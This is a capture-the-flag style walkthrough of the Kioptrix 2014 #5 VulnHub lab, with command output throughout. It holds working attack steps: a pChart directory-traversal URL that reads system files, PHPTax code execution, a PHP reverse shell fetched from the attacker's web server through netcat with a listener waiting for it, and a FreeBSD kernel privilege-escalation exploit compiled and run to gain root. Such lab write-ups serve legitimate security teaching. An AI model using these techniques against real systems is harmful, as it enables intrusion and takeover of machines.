VulnHub - Kioptrix 2014 #5

Lets continue the Kioptrix series with Kioptrix 2014 #5

## Objective

The Kioptrix series is aimed and beginners and thus are pretty easy challenges. The objective is getting root access to the vm via any means possible, except by hacking the actual vm client. The purpose of these vulnerable vm’s are to learn the basic techniques and tools used in penetration tests. There are more than one way of achieving the objective in this challenge.

The Kioptrix 2014 VM can be downloaded from here. Note that it is an vmware image and can be used in vmware workstation or player. You can convert the image to be compatible with virtualbox.

## The Hack

The first step with every penetration test is intellegence gathering. This consists of passive / active recon and enumeration. Find out which services are running on the target server that are open to the world and which version they are using so that you can search for known vulnerabilities.

To achieve this we will be using a tool that will become the foundation of your pentesting toolkit. Nmap. nmap man page can be found here - it will explain all the options / flags / arguments usable with nmap.

nmap -vv --reason -sV -sC -Pn --min-rate=400 -T4 --script-timeout 10m -p- 192.168.163.137
Nmap scan report for 192.168.163.137
Host is up, received user-set (0.00088s latency).
Scanned at 2018-03-09 19:29:26 SAST for 109s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT     STATE  SERVICE REASON       VERSION
22/tcp   closed ssh     conn-refused
80/tcp   open   http    syn-ack      Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   http    syn-ack      Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar  9 19:31:15 2018 -- 1 IP address (1 host up) scanned in 110.47 seconds

Only two ports that we can access. Port 80 and 8080.

Let’s browse to port 80 and 8080 and see what comes up

Port 80:

Port: 8080:

A default http page on port 80 and forbidden response on port 8080.

Let’s run nikto quickly and see what we get.

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.163.137
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 19:22:52 2014
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OPTIONS Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.163.137
+ Target Port: 8080
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST

hmmm so nothing really useful from nikto or dirbuster..

Have a look at the source for the “it works!” page..

 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

a Hidden url. Browse to it.

http://192.168.163.137/pChart2.1.3/index.php

redirects to

http://192.168.163.137/pChart2.1.3/examples/index.php

yy

They are running a app called pChart and using version 2.1.3. A quick search through exploitdb shows that directory traversal is possible.

apb@stratios:~$ searchsploit pChart
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                                                                                                   | exploits/php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
apb@stratios:~$ vim /usr/share/exploitdb/exploits/php/webapps/31173.txt
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.

The above tells us that it is possible to view files on the server, which would in any other case be inaccessible. Let’s try the poc and see if we can read the passwd file of the server.

Browse to http://192.168.163.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

Scary… we can read the passwd file..

Let’s see if we can read the apache config and find anything relating to the forbidden access on port 8080.

The apache config on FreeBSD is located at /usr/local/etc/apache22/httpd.conf

Browse to http://192.168.163.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf

…And we can read the whole config. That is only the top part. The config is quite long. Continue reading for anything relating to port 8080.

So only browsers who has a User-Agent set to Mozilla 4 can access the site on port 8080. That’s relative easy. No need for credentials. You can trick the webserver by changing your browsers user agent within firefox.

After a quick google we will have to add a new useragent that will override the default.

Mozilla/4.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0

Now lets try to browse to port 8080.

Alternatively, if you did not want to modify firefox, you could use curl

apb@stratios:~$ curl -H "User-Agent:Mozilla/4.0" http://192.168.163.137:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>

There is a directory called phptax. Let’s browse to it and see what’s going on.

It is running some tax program called PHPTAX.

Quick search for known exploits.

apb@stratios:~$ searchsploit phptax
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                                                                                                            | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                                                                                                         | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                                                                                                        | exploits/php/webapps/21665.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

PHPTAX is vulnerable to remote code injection and there seems to be a exploit on metasploit, but let’s try to compromise this target manually.

After researching about the exploit, we are able to read, write and execute commands because of the feaute in the app which is used to create pdf’s.

I ran an “id” and wrote it to a file out.txt; which we are able to browse to and read.

First I tried to use nc to create a reverse shell, but unfortunately the netcat installed on this freebsd server does not come with a execute option.

Move on to our next option, a php shell.

On kali there is a php shell from pentestmonkey.

To get the php shell onto the target machine, we will copy it to our webserver and try to download it from the target machine.

root@stratios:~# cp /usr/share/webshells/php/php-reverse-shell.php  /var/www/html/shell.txt

Modify the script to connect to your kali machine’s ip and whatever port you want to use.

Start httpd.

root@stratios:/etc/init.d# /etc/init.d/apache2 start

Now to get it over to the target machine.

wget is not installed..

We will have to get creative..

We will create a file on the target machine which does a http GET request to download the php shell from our webserver.

Then we will run that http get through netcat to download the file.

printf "GET http://192.168.163.128/shell.txt HTTP/1.0\r\n\r\n" > shell.txt

Confirm the file was created with required content.

Now redirect that file into netcat to download the php shell.

Now we can set up nc to listen for incoming connections.

On kali:

root@stratios:~# nc -nlvp 1234
listening on [any] 1234 ...

Run the shell

root@stratios:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.163.128] from (UNKNOWN) [192.168.163.137] 30398
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
 7:07AM  up 5 hrs, 0 users, load averages: 0.02, 0.01, 0.00
USER       TTY      FROM                      LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
$ 

… And we have a limited shell!

Next lets look for a privilege escalation exploit.

We know the target is running FreeBSD 9.

apb@stratios:~$ searchsploit FreeBSD 9.0
--------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                 |  Path
                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation         | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation   | exploits/freebsd/local/26368.c
--------------------------------------------------------------- ----------------------------------------

Let’s try the first one.

Copy over the exploit using nc.

On your kali machine

root@stratios:# nc -lvp 12345 < 28718.c 
listening on [any] 12345 ...

target machine

target machine
$ nc -nv 192.168.163.128 12345 > exploit.c
Connection to 192.168.163.128 12345 port [tcp/*] succeeded!

back to kali machine

root@stratios:/var/www/html# nc -lvp 12345 < 28718.c 
listening on [any] 12345 ...
192.168.163.137: inverse host lookup failed: Unknown host
connect to [192.168.163.128] from (UNKNOWN) [192.168.163.137] 63805

confirm exploit was copied over

$ ls -l
total 40
-rw-rw-rw-  1 www    wheel  5563 Mar 23 02:09 exploit.c

compile the exploit

$ gcc exploit.c
exploit.c:178:2: warning: no newline at end of file
$ ls -l
total 64
-rwxrwxrwx  1 www    wheel  10408 Mar 23 02:12 a.out

run the exploit

$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

And we have root on the target machine! This vm was more challenging than the ones before but it was fun nonetheless.

Don’t forget to remove that user agent we added in firefox earlier!

Thanks for reading.

Updated: